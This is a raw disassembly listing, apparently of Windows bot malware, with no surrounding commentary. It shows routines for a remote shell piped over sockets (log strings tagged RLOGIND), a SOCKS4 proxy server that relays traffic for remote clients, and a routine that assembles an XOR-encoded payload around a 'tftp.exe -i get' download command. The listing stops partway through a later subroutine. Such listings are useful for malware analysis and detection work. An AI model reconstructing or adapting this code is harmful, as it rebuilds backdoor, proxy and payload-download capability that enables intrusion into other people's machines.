lea eax, [ebp+74h+var_8]
push eax
push dword ptr [edi+0Ch]
call dword_43589C ; send
test eax, eax
jle short loc_4107BD
loc_41076B: ; CODE XREF: sub_4106B0+53�j
mov al, byte ptr [ebp+74h+arg_0+3]
loc_41076E: ; CODE XREF: sub_4106B0+96�j
cmp al, 0Dh
jnz short loc_4107A5
push ebx
lea eax, [ebp+74h+var_14]
push eax
push esi
lea eax, [ebp+74h+var_DC]
push eax
push dword ptr [edi+4]
call ds:dword_420040 ; WriteFile
test eax, eax
jz short loc_4107BD
xor esi, esi
jmp short loc_4107A5
; ---------------------------------------------------------------------------
loc_41078D: ; CODE XREF: sub_4106B0+36�j
cmp [ebp+74h+var_C], ebx
jnz short loc_41079B
mov [ebp+74h+var_C], 1
jmp short loc_4107A5
; ---------------------------------------------------------------------------
loc_41079B: ; CODE XREF: sub_4106B0+E0�j
mov [ebp+74h+var_10], 0Ah
loc_4107A2: ; CODE XREF: sub_4106B0+18�j
mov [ebp+74h+var_C], ebx
loc_4107A5: ; CODE XREF: sub_4106B0+25�j
; sub_4106B0+C0�j ...
push ebx
push 1
lea eax, [ebp+74h+arg_0+3]
push eax
push dword ptr [edi+0Ch]
call dword_43577C ; recv
test eax, eax
jg loc_4106CD
loc_4107BD: ; CODE XREF: sub_4106B0+B9�j
; sub_4106B0+D7�j
pop edi
pop esi
pop ebx
add ebp, 74h
leave
retn
sub_4106B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4107C5 proc near ; CODE XREF: sub_4108C1+D�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push esi
push edi
xor edi, edi
push 18h
mov [ebp+var_4], edi
mov [ebp+var_8], edi
call sub_414CAD
mov esi, eax
cmp esi, edi
pop ecx
jnz short loc_4107EA
xor eax, eax
jmp loc_4108BD
; ---------------------------------------------------------------------------
loc_4107EA: ; CODE XREF: sub_4107C5+1C�j
push ebx
push edi
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_8]
mov [esi], edi
push eax
lea ebx, [esi+4]
mov [ebx], edi
push esi
mov [ebp+var_14], 0Ch
mov [ebp+var_10], edi
mov [ebp+var_C], 1
call ds:dword_420114 ; CreatePipe
test eax, eax
mov edi, ds:dword_42003C
jnz short loc_41082B
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aRlogindFaile_3 ; "[RLOGIND]: Failed to create shell stdou"...
jmp short loc_41084C
; ---------------------------------------------------------------------------
loc_41082B: ; CODE XREF: sub_4107C5+56�j
push 0
lea eax, [ebp+var_14]
push eax
push ebx
lea eax, [ebp+var_4]
push eax
call ds:dword_420114 ; CreatePipe
test eax, eax
jnz short loc_410854
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aRlogindFaile_4 ; "[RLOGIND]: Failed to create shell stdin"...
loc_41084C: ; CODE XREF: sub_4107C5+64�j
call sub_401F73
pop ecx
jmp short loc_410881
; ---------------------------------------------------------------------------
loc_410854: ; CODE XREF: sub_4107C5+79�j
push [ebp+arg_0]
mov ebx, [ebp+var_8]
push [ebp+var_4]
call sub_410547
pop ecx
pop ecx
mov [esi+8], eax
push [ebp+var_4]
call edi ; CloseHandle
push [ebp+var_8]
call edi ; CloseHandle
cmp dword ptr [esi+8], 0
jnz short loc_4108B6
push offset aRlogindFaile_5 ; "[RLOGIND]: Failed to execute shell."
call sub_401EFF
loc_410881: ; CODE XREF: sub_4107C5+8D�j
cmp [ebp+var_4], 0
pop ecx
jz short loc_41088D
push [ebp+var_4]
call edi ; CloseHandle
loc_41088D: ; CODE XREF: sub_4107C5+C1�j
cmp [ebp+var_8], 0
jz short loc_410898
push [ebp+var_8]
call edi ; CloseHandle
loc_410898: ; CODE XREF: sub_4107C5+CC�j
mov eax, [esi]
test eax, eax
jz short loc_4108A1
push eax
call edi ; CloseHandle
loc_4108A1: ; CODE XREF: sub_4107C5+D7�j
mov eax, [esi+4]
test eax, eax
jz short loc_4108AB
push eax
call edi ; CloseHandle
loc_4108AB: ; CODE XREF: sub_4107C5+E1�j
push esi
call sub_414844
pop ecx
xor eax, eax
jmp short loc_4108BC
; ---------------------------------------------------------------------------
loc_4108B6: ; CODE XREF: sub_4107C5+B0�j
or dword ptr [esi+0Ch], 0FFFFFFFFh
mov eax, esi
loc_4108BC: ; CODE XREF: sub_4107C5+EF�j
pop ebx
loc_4108BD: ; CODE XREF: sub_4107C5+20�j
pop edi
pop esi
leave
retn
sub_4107C5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4108C1 proc near ; CODE XREF: sub_40F4D9+1BC�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
push edi
call sub_4107C5
imul edi, 234h
mov esi, eax
mov eax, dword_4366AC[edi]
mov edi, ds:dword_42000C
xor ebx, ebx
pop ecx
mov [ebp+var_C], 0Ch
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov [esi+0Ch], eax
lea eax, [ebp+arg_0]
push eax
push ebx
push esi
push offset sub_410613
push ebx
lea eax, [ebp+var_C]
push eax
call edi ; CreateThread
cmp eax, ebx
mov [esi+10h], eax
jnz short loc_410930
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aRlogindFaile_6 ; "[RLOGIND]: Failed to create ReadShell s"...
call sub_401F73
or dword ptr [esi+0Ch], 0FFFFFFFFh
pop ecx
xor eax, eax
jmp loc_410A10
; ---------------------------------------------------------------------------
loc_410930: ; CODE XREF: sub_4108C1+50�j
lea eax, [ebp+arg_0]
push eax
push ebx
push esi
push offset sub_4106B0
push ebx
lea eax, [ebp+var_C]
push eax
call edi ; CreateThread
cmp eax, ebx
mov [esi+14h], eax
jnz short loc_410971
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aRlogindFaile_6 ; "[RLOGIND]: Failed to create ReadShell s"...
call sub_401F73
or dword ptr [esi+0Ch], 0FFFFFFFFh
pop ecx
pop ecx
push ebx
push dword ptr [esi+14h]
call ds:dword_4200F0 ; TerminateThread
xor eax, eax
jmp loc_410A11
; ---------------------------------------------------------------------------
loc_410971: ; CODE XREF: sub_4108C1+86�j
mov eax, [esi+10h]
mov [ebp+var_18], eax
mov eax, [esi+14h]
mov [ebp+var_14], eax
mov eax, [esi+8]
push 0FFFFFFFFh
mov [ebp+var_10], eax
push ebx
lea eax, [ebp+var_18]
push eax
push 3
call ds:dword_42012C ; WaitForMultipleObjects
sub eax, ebx
jz short loc_4109CB
dec eax
jz short loc_4109C5
dec eax
jz short loc_4109B1
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aRlogindWaitfor ; "[RLOGIND]: WaitForMultipleObjects error"...
call sub_401F73
pop ecx
pop ecx
jmp short loc_4109E0
; ---------------------------------------------------------------------------
loc_4109B1: ; CODE XREF: sub_4108C1+D9�j
mov edi, ds:dword_4200F0
push ebx
push dword ptr [esi+14h]
call edi ; TerminateThread
push ebx
push dword ptr [esi+10h]
call edi ; TerminateThread
jmp short loc_4109E0
; ---------------------------------------------------------------------------
loc_4109C5: ; CODE XREF: sub_4108C1+D6�j
push ebx
push dword ptr [esi+10h]
jmp short loc_4109CF
; ---------------------------------------------------------------------------
loc_4109CB: ; CODE XREF: sub_4108C1+D3�j
push ebx
push dword ptr [esi+14h]
loc_4109CF: ; CODE XREF: sub_4108C1+108�j
call ds:dword_4200F0 ; TerminateThread
push 1
push dword ptr [esi+8]
call ds:dword_4200E8 ; TerminateProcess
loc_4109E0: ; CODE XREF: sub_4108C1+EE�j
; sub_4108C1+102�j
push dword ptr [esi+10h]
mov edi, ds:dword_42003C
call edi ; CloseHandle
push dword ptr [esi+14h]
call edi ; CloseHandle
push dword ptr [esi+8]
call edi ; CloseHandle
push dword ptr [esi]
call edi ; CloseHandle
push dword ptr [esi+4]
call edi ; CloseHandle
push dword ptr [esi+0Ch]
call dword_435914 ; closesocket
push esi
call sub_414844
xor eax, eax
inc eax
loc_410A10: ; CODE XREF: sub_4108C1+6A�j
pop ecx
loc_410A11: ; CODE XREF: sub_4108C1+AB�j
pop edi
pop esi
pop ebx
leave
retn
sub_4108C1 endp
; =============== S U B R O U T I N E =======================================
sub_410A16 proc near ; CODE XREF: sub_410A42+A�p
; sub_410C45+8�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
lea edx, [eax+1]
loc_410A1D: ; CODE XREF: sub_410A16+C�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_410A1D
sub eax, edx
push esi
mov esi, eax
mov eax, [esp+4+arg_4]
lea ecx, [eax+1]
loc_410A30: ; CODE XREF: sub_410A16+1F�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_410A30
sub eax, ecx
lea eax, [esi+eax*2+0C1h]
pop esi
retn
sub_410A16 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410A42 proc near ; CODE XREF: sub_410C5C+49�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_C]
push [ebp+arg_8]
call sub_410A16
cmp eax, [ebp+arg_4]
pop ecx
pop ecx
mov [ebp+var_4], eax
jbe short loc_410A5F
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_410A5F: ; CODE XREF: sub_410A42+17�j
mov eax, [ebp+arg_8]
lea edx, [eax+1]
loc_410A65: ; CODE XREF: sub_410A42+28�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_410A65
sub eax, edx
push ebx
mov edx, eax
mov eax, [ebp+arg_C]
push esi
push edi
mov [ebp+arg_4], edx
lea esi, [eax+1]
loc_410A7C: ; CODE XREF: sub_410A42+3F�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_410A7C
sub eax, esi
mov ebx, [ebp+arg_0]
lea ecx, [eax+edx+12h]
mov dword_42C42C, ecx
push 0FFFFFFEDh
lea ecx, [eax+1]
mov dword_42C44D, ecx
lea ecx, [eax+17h]
mov dword_42C445, ecx
pop ecx
sub ecx, eax
mov dword_42C45B, ecx
push 1Dh
pop ecx
mov edi, ebx
mov esi, offset dword_42C3C8
rep movsd
mov esi, [ebp+arg_8]
mov ecx, edx
shr ecx, 2
lea edi, [ebx+74h]
rep movsd
mov ecx, edx
mov edx, [ebp+arg_4]
and ecx, 3
rep movsb
add edx, 74h
lea edi, [edx+ebx]
mov esi, (offset aTftp_exeIGet+0Ch)
movsd
movsb
mov esi, [ebp+arg_C]
add edx, 5
lea edi, [edx+ebx]
mov ecx, eax
mov ebx, ecx
shr ecx, 2
rep movsd
mov ecx, ebx
mov ebx, [ebp+arg_0]
and ecx, 3
rep movsb
add edx, eax
lea edi, [edx+ebx]
mov esi, (offset aTftp_exeIGet+11h)
movsd
movsd
movsd
movsd
mov esi, [ebp+arg_C]
add edx, 10h
mov ecx, eax
lea edi, [edx+ebx]
mov ebx, ecx
shr ecx, 2
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
push 0Eh
lea edi, [edx+eax]
add edi, [ebp+arg_0]
mov eax, [ebp+var_4]
pop ecx
mov esi, offset byte_42C451
rep movsd
pop edi
pop esi
pop ebx
leave
retn
sub_410A42 endp
; =============== S U B R O U T I N E =======================================
sub_410B3A proc near ; CODE XREF: sub_410B55+41�p
; sub_410C45+E�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test cl, cl
jnz short loc_410B43
inc ecx
loc_410B43: ; CODE XREF: sub_410B3A+6�j
mov eax, 0FFh
cmp eax, ecx
sbb eax, eax
and eax, 2
add eax, 15h
add eax, ecx
retn
sub_410B3A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410B55 proc near ; CODE XREF: sub_410C5C+56�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_C]
cmp bl, 0Ah
push esi
jz short loc_410B70
cmp bl, 0Dh
jz short loc_410B70
cmp bl, 5Ch
jz short loc_410B70
test bl, bl
jnz short loc_410B71
loc_410B70: ; CODE XREF: sub_410B55+B�j
; sub_410B55+10�j ...
inc ebx
loc_410B71: ; CODE XREF: sub_410B55+19�j
mov esi, 0FFh
cmp ebx, esi
jbe short loc_410B95
mov eax, ebx
shr eax, 8
cmp al, 0Ah
jz short loc_410B8F
cmp al, 0Dh
jz short loc_410B8F
cmp al, 5Ch
jz short loc_410B8F
test al, al
jnz short loc_410B95
loc_410B8F: ; CODE XREF: sub_410B55+2C�j
; sub_410B55+30�j ...
add ebx, 100h
loc_410B95: ; CODE XREF: sub_410B55+23�j
; sub_410B55+38�j
push ebx
call sub_410B3A
cmp eax, [ebp+arg_4]
pop ecx
mov [ebp+arg_C], eax
ja short loc_410BAB
cmp eax, 0FFFFh
jbe short loc_410BB2
loc_410BAB: ; CODE XREF: sub_410B55+4D�j
xor eax, eax
jmp loc_410C41
; ---------------------------------------------------------------------------
loc_410BB2: ; CODE XREF: sub_410B55+54�j
mov dl, byte_47C180
xor eax, eax
test ebx, ebx
jbe short loc_410BE0
loc_410BBE: ; CODE XREF: sub_410B55+89�j
mov ecx, [ebp+arg_8]
mov cl, [eax+ecx]
xor cl, dl
jz short loc_410BD7
cmp cl, 0Ah
jz short loc_410BD7
cmp cl, 0Dh
jz short loc_410BD7
cmp cl, 5Ch
jnz short loc_410BDB
loc_410BD7: ; CODE XREF: sub_410B55+71�j
; sub_410B55+76�j ...
inc dl
xor eax, eax
loc_410BDB: ; CODE XREF: sub_410B55+80�j
inc eax
cmp eax, ebx
jb short loc_410BBE
loc_410BE0: ; CODE XREF: sub_410B55+67�j
cmp ebx, esi
push edi
mov edi, [ebp+arg_0]
push 5
mov byte_47C180, dl
pop ecx
ja short loc_410C08
mov esi, offset loc_42C3B0
mov byte_42C3BD, bl
mov byte_42C3C1, dl
rep movsd
push 15h
jmp short loc_410C20
; ---------------------------------------------------------------------------
loc_410C08: ; CODE XREF: sub_410B55+9A�j
mov word_42C3A6, bx
mov byte_42C3AB, dl
mov esi, offset loc_42C398
rep movsd
movsw
push 17h
loc_410C20: ; CODE XREF: sub_410B55+B1�j
pop eax
xor ecx, ecx
test ebx, ebx
movsb
pop edi
jbe short loc_410C3E
mov esi, [ebp+arg_0]
add esi, eax
loc_410C2E: ; CODE XREF: sub_410B55+E7�j
mov eax, [ebp+arg_8]
mov al, [ecx+eax]
xor al, dl
mov [esi+ecx], al
inc ecx
cmp ecx, ebx
jb short loc_410C2E
loc_410C3E: ; CODE XREF: sub_410B55+D2�j
mov eax, [ebp+arg_C]
loc_410C41: ; CODE XREF: sub_410B55+58�j
pop esi
pop ebx
pop ebp
retn
sub_410B55 endp
; =============== S U B R O U T I N E =======================================
sub_410C45 proc near ; CODE XREF: sub_410C5C+D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_410A16
push eax
call sub_410B3A
add esp, 0Ch
retn
sub_410C45 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410C5C proc near ; CODE XREF: sub_4125E5+6D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_8]
push edi
mov edi, [ebp+arg_C]
push edi
push ebx
call sub_410C45
cmp eax, [ebp+arg_4]
pop ecx
pop ecx
ja short loc_410C7C
cmp eax, 0FFFFh
jbe short loc_410C80
loc_410C7C: ; CODE XREF: sub_410C5C+17�j
xor eax, eax
jmp short loc_410CC5
; ---------------------------------------------------------------------------
loc_410C80: ; CODE XREF: sub_410C5C+1E�j
push esi
push edi
push ebx
call sub_410A16
add eax, 101h
push eax
call sub_414CAD
add esp, 0Ch
push edi
push ebx
push edi
push ebx
mov esi, eax
call sub_410A16
pop ecx
pop ecx
push eax
push esi
call sub_410A42
push eax
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call sub_410B55
push esi
mov edi, eax
call sub_414844
add esp, 24h
mov eax, edi
pop esi
loc_410CC5: ; CODE XREF: sub_410C5C+22�j
pop edi
pop ebx
pop ebp
retn
sub_410C5C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410CC9 proc near ; CODE XREF: sub_410DC6+200�p
var_504 = byte ptr -504h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
var_FC = dword ptr -0FCh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 504h
push ebx
push esi
push edi
xor ebx, ebx
mov esi, 400h
loc_410CDC: ; CODE XREF: sub_410CC9+C0�j
; sub_410CC9+F2�j
mov eax, [ebp+arg_4]
xor ecx, ecx
inc ecx
mov [ebp+var_100], eax
mov [ebp+var_104], ecx
xor eax, eax
loc_410CF0: ; CODE XREF: sub_410CC9+36�j
mov edx, [ebp+arg_0]
cmp [ebp+eax*4+var_100], edx
jz short loc_410D01
inc eax
cmp eax, ecx
jb short loc_410CF0
loc_410D01: ; CODE XREF: sub_410CC9+31�j
cmp eax, ecx
jnz short loc_410D15
mov [ebp+var_FC], edx
mov [ebp+var_104], 2
loc_410D15: ; CODE XREF: sub_410CC9+3A�j
push ebx
xor eax, eax
push ebx
mov ecx, 100h
lea edi, [ebp+var_504]
rep stosd
push ebx
lea eax, [ebp+var_104]
push eax
push ebx
call dword_4358AC ; select
lea eax, [ebp+var_104]
push eax
push [ebp+arg_4]
call dword_43585C ; __WSAFDIsSet
test eax, eax
jz short loc_410D77
push ebx
push esi
lea eax, [ebp+var_504]
push eax
push [ebp+arg_4]
call dword_43577C ; recv
cmp eax, 0FFFFFFFFh
jz short loc_410DC1
push ebx
push eax
lea eax, [ebp+var_504]
push eax
push [ebp+arg_0]
call dword_43589C ; send
cmp eax, 0FFFFFFFFh
jz short loc_410DC1
loc_410D77: ; CODE XREF: sub_410CC9+7E�j
lea eax, [ebp+var_104]
push eax
push [ebp+arg_0]
call dword_43585C ; __WSAFDIsSet
test eax, eax
jz loc_410CDC
push ebx
push esi
lea eax, [ebp+var_504]
push eax
push [ebp+arg_0]
call dword_43577C ; recv
cmp eax, 0FFFFFFFFh
jz short loc_410DC1
push ebx
push eax
lea eax, [ebp+var_504]
push eax
push [ebp+arg_4]
call dword_43589C ; send
cmp eax, 0FFFFFFFFh
jnz loc_410CDC
loc_410DC1: ; CODE XREF: sub_410CC9+95�j
; sub_410CC9+AC�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_410CC9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_410DC6 proc near ; DATA XREF: sub_410FF6+13F�o
var_5D8 = dword ptr -5D8h
var_5D4 = dword ptr -5D4h
var_4D4 = byte ptr -4D4h
var_4D3 = byte ptr -4D3h
var_4D2 = word ptr -4D2h
var_4D0 = dword ptr -4D0h
var_4CC = byte ptr -4CCh
var_CC = byte ptr -0CCh
var_48 = byte ptr -48h
var_30 = dword ptr -30h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 5D8h
mov edx, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 2Ch
pop ecx
mov esi, edx
lea edi, [ebp+74h+var_CC]
rep movsd
mov edi, [ebp+74h+var_30]
xor eax, eax
inc eax
mov [edx+0ACh], eax
mov esi, edi
mov [ebp+74h+var_5D8], eax
imul esi, 234h
mov ecx, dword_4366AC[esi]
xor ebx, ebx
lea eax, [ebp+74h+var_C]
push eax
push ebx
push ebx
lea eax, [ebp+74h+var_5D8]
push eax
push ebx
mov [ebp+74h+arg_0], edi
mov [ebp+74h+var_C], 5
mov [ebp+74h+var_8], ebx
mov [ebp+74h+var_5D4], ecx
call dword_4358AC ; select
test eax, eax
jnz short loc_410E39
push dword_4366AC[esi]
jmp loc_410FE1
; ---------------------------------------------------------------------------
loc_410E39: ; CODE XREF: sub_410DC6+66�j
push ebx
push 408h
lea eax, [ebp+74h+var_4D4]
push eax
push dword_4366AC[esi]
call dword_43577C ; recv
test eax, eax
jle loc_410FDB
cmp [ebp+74h+var_4D4], 4
jnz loc_410FDB
cmp [ebp+74h+var_4D3], 1
jnz loc_410FDB
cmp [ebp+74h+var_48], bl
jz loc_410F0F
lea eax, [ebp+74h+var_48]
lea edi, [ebp+74h+var_4CC]
loc_410E86: ; CODE XREF: sub_410DC6+DC�j
mov dl, [edi]
mov cl, dl
cmp dl, [eax]
jnz short loc_410EA8
cmp cl, bl
jz short loc_410EA4
mov dl, [edi+1]
mov cl, dl
cmp dl, [eax+1]
jnz short loc_410EA8
inc edi
inc edi
inc eax
inc eax
cmp cl, bl
jnz short loc_410E86
loc_410EA4: ; CODE XREF: sub_410DC6+CA�j
xor eax, eax
jmp short loc_410EAD
; ---------------------------------------------------------------------------
loc_410EA8: ; CODE XREF: sub_410DC6+C6�j
; sub_410DC6+D4�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_410EAD: ; CODE XREF: sub_410DC6+E0�j
cmp eax, ebx
jz short loc_410F0F
lea eax, [ebp+74h+var_48]
push eax
lea eax, [ebp+74h+var_4CC]
push eax
push offset aSocks4Authenti ; "[SOCKS4]: Authentication failed. Remote"...
call sub_401F73
add esp, 0Ch
mov [ebp+74h+var_4D4], bl
mov [ebp+74h+var_4D3], 5Dh
loc_410ED6: ; CODE XREF: sub_410DC6+1C0�j
xor eax, eax
push ebx
mov ecx, 100h
lea edi, [ebp+74h+var_4CC]
rep stosd
push 8
lea eax, [ebp+74h+var_4D4]
push eax
push dword_4366AC[esi]
call dword_43589C ; send
loc_410EFB: ; CODE XREF: sub_410DC6+210�j
push dword_4366AC[esi]
call dword_435914 ; closesocket
push [ebp+74h+arg_0]
jmp loc_410FE8
; ---------------------------------------------------------------------------
loc_410F0F: ; CODE XREF: sub_410DC6+B1�j
; sub_410DC6+E9�j
xor eax, eax
lea edi, [ebp+74h+var_1C]
stosd
stosd
stosd
stosd
mov ax, [ebp+74h+var_4D2]
push 6
mov [ebp+74h+var_1A], ax
mov eax, [ebp+74h+var_4D0]
push 1
push 2
mov [ebp+74h+var_1C], 2
mov [ebp+74h+var_18], eax
call dword_435808 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+74h+var_4], eax
jnz short loc_410F54
call dword_4358C0 ; WSAGetLastError
push eax
push offset aSocks4ErrorFai ; "[SOCKS4]: Error: Failed to open socket("...
jmp short loc_410F72
; ---------------------------------------------------------------------------
loc_410F54: ; CODE XREF: sub_410DC6+17E�j
push 10h
lea ecx, [ebp+74h+var_1C]
push ecx
push eax
call dword_4357C0 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_410F8B
call dword_4358C0 ; WSAGetLastError
push eax
push offset aSocks4ErrorF_0 ; "[SOCKS4]: Error: Failed to connect to t"...
loc_410F72: ; CODE XREF: sub_410DC6+18C�j
call sub_401F73
pop ecx
pop ecx
mov [ebp+74h+var_4D4], bl
mov [ebp+74h+var_4D3], 5Bh
jmp loc_410ED6
; ---------------------------------------------------------------------------
loc_410F8B: ; CODE XREF: sub_410DC6+19E�j
xor eax, eax
push ebx
mov [ebp+74h+var_4D4], bl
mov [ebp+74h+var_4D3], 5Ah
mov ecx, 100h
lea edi, [ebp+74h+var_4CC]
rep stosd
push 8
lea eax, [ebp+74h+var_4D4]
push eax
push dword_4366AC[esi]
call dword_43589C ; send
push dword_4366AC[esi]
push [ebp+74h+var_4]
call sub_410CC9
pop ecx
pop ecx
push [ebp+74h+var_4]
call dword_435914 ; closesocket
jmp loc_410EFB
; ---------------------------------------------------------------------------
loc_410FDB: ; CODE XREF: sub_410DC6+8E�j
; sub_410DC6+9B�j ...
push dword_4366AC[esi]
loc_410FE1: ; CODE XREF: sub_410DC6+6E�j
call dword_435914 ; closesocket
push edi
loc_410FE8: ; CODE XREF: sub_410DC6+144�j
call sub_41255E
pop ecx
push ebx
call ds:dword_420014 ; ExitThread
int 3 ; Trap to Debugger
sub_410DC6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_410FF6 proc near ; DATA XREF: sub_4089DC+4D9A�o
var_2D4 = byte ptr -2D4h
var_D4 = dword ptr -0D4h
var_D0 = byte ptr -0D0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 2D4h
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
mov esi, eax
push 2Ch
pop ecx
xor ebx, ebx
lea edi, [ebp+74h+var_D4]
rep movsd
push [ebp+74h+var_40]
inc ebx
mov [eax+0A8h], ebx
xor eax, eax
lea edi, [ebp+74h+var_14]
stosd
stosd
stosd
stosd
mov [ebp+74h+var_4], 10h
mov [ebp+74h+var_14], 2
call dword_435954 ; htons
push 6
push ebx
xor esi, esi
push 2
mov [ebp+74h+var_12], ax
mov [ebp+74h+var_10], esi
call dword_435808 ; socket
mov edi, eax
mov eax, [ebp+74h+var_3C]
imul eax, 234h
mov dword_4366AC[eax], edi
push 10h
lea eax, [ebp+74h+var_14]
push eax
push edi
call dword_4358E0 ; bind
test eax, eax
jnz loc_411187
push 0Ah
push edi
call dword_435928 ; listen
test eax, eax
jnz loc_411187
push [ebp+74h+var_40]
push [ebp+74h+var_D4]
call sub_407D15
pop ecx
push eax
lea eax, [ebp+74h+var_2D4]
push offset aSocks4ServerSt ; "[SOCKS4]: Server started on: %s:%d."
push eax
call sub_414415
add esp, 10h
cmp [ebp+74h+var_30], esi
jnz short loc_4110C4
push esi
push [ebp+74h+var_34]
lea eax, [ebp+74h+var_2D4]
push eax
lea eax, [ebp+74h+var_D0]
push eax
push [ebp+74h+var_D4]
call sub_4056BF
add esp, 14h
loc_4110C4: ; CODE XREF: sub_410FF6+B2�j
; sub_410FF6+17A�j ...
lea eax, [ebp+74h+var_2D4]
push eax
call sub_401EFF
pop ecx
lea eax, [ebp+74h+var_4]
push eax
lea eax, [ebp+74h+var_24]
push eax
push edi
call dword_4357CC ; accept
push [ebp+74h+var_3C]
mov ebx, eax
movzx eax, [ebp+74h+var_22]
push eax
push [ebp+74h+var_20]
mov [ebp+74h+var_28], esi
call dword_435888 ; inet_ntoa
push eax
lea eax, [ebp+74h+var_2D4]
push offset aSocks4ClientCo ; "[SOCKS4]: Client connection from IP: %s"...
push eax
call sub_414415
push ebx
lea eax, [ebp+74h+var_2D4]
push 12h
push eax
call sub_41229A
mov ecx, [ebp+74h+var_3C]
mov [ebp+74h+var_38], eax
imul eax, 234h
add esp, 20h
mov dword_4366A4[eax], ecx
lea eax, [ebp+74h+arg_0]
push eax
push esi
lea eax, [ebp+74h+var_D4]
push eax
push offset sub_410DC6
push esi
push esi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+74h+var_38]
imul ecx, 234h
cmp eax, esi
mov dword_4366B4[ecx], eax
jnz short loc_41117D
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+74h+var_2D4]
push offset aSocks4Failed_0 ; "[SOCKS4]: Failed to start client thread"...
push eax
call sub_414415
add esp, 0Ch
jmp loc_4110C4
; ---------------------------------------------------------------------------
loc_411175: ; CODE XREF: sub_410FF6+18A�j
push 5
call ds:dword_420000 ; Sleep
loc_41117D: ; CODE XREF: sub_410FF6+15D�j
cmp [ebp+74h+var_28], esi
jz short loc_411175
jmp loc_4110C4
; ---------------------------------------------------------------------------
loc_411187: ; CODE XREF: sub_410FF6+77�j
; sub_410FF6+88�j
push edi
call dword_435914 ; closesocket
push [ebp+74h+var_40]
lea eax, [ebp+74h+var_2D4]
push offset aSocks4Failed_1 ; "[SOCKS4]: Failed to start server on Por"...
push eax
call sub_414415
add esp, 0Ch
cmp [ebp+74h+var_30], esi
jnz short loc_4111C4
push esi
push [ebp+74h+var_34]
lea eax, [ebp+74h+var_2D4]
push eax
lea eax, [ebp+74h+var_D0]
push eax
push [ebp+74h+var_D4]
call sub_4056BF
add esp, 14h
loc_4111C4: ; CODE XREF: sub_410FF6+1B2�j
lea eax, [ebp+74h+var_2D4]
push eax
call sub_401EFF
push [ebp+74h+var_3C]
call sub_41255E
pop ecx
pop ecx
push esi
call ds:dword_420014 ; ExitThread
int 3 ; Trap to Debugger
sub_410FF6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=68h
sub_4111E2 proc near ; CODE XREF: sub_41145E+3C�p
var_288 = byte ptr -288h
var_F8 = byte ptr -0F8h
var_B8 = byte ptr -0B8h
var_B7 = byte ptr -0B7h
var_A4 = byte ptr -0A4h
var_98 = byte ptr -98h
var_90 = byte ptr -90h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = byte ptr -74h
var_73 = byte ptr -73h
var_72 = word ptr -72h
